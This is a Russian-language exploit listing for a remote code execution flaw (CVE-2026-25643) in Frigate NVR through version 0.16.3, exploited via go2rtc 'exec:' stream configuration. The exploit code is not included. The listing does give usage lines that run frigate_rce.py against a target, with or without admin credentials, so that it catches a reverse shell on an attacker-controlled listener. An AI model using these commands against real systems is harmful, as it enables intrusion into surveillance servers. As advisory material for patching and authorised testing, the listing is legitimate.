
Название эксплойта: Frigate NVR <= 0.16.3 - аутентифицированное удалённое выполнение
кода
Дата: 2026-02-05
Автор эксплойта: jduardo2704
Домашняя страница вендора: https://frigate.video/
Ссылка на ПО: https://github.com/blakeblackshear/frigate
Версия: <= 0.16.3
CVE: CVE-2026-25643
Консультация: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Версии Frigate до 0.16.3 уязвимы для удалённого выполнения кода (RCE) через конфигурацию go2rtc. Атакующий с аутентифицированным доступом (или без аутентификации, если экземпляр доступен извне) может внедрять системные команды в конфигурацию потока с помощью протокола exec:. Этот эксплойт автоматизирует внедрение полезной нагрузки, перезапускает сервис и перехватывает обратную оболочку.
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
Этот скрипт предназначен только для образовательных целей и авторизованного тестирования безопасности.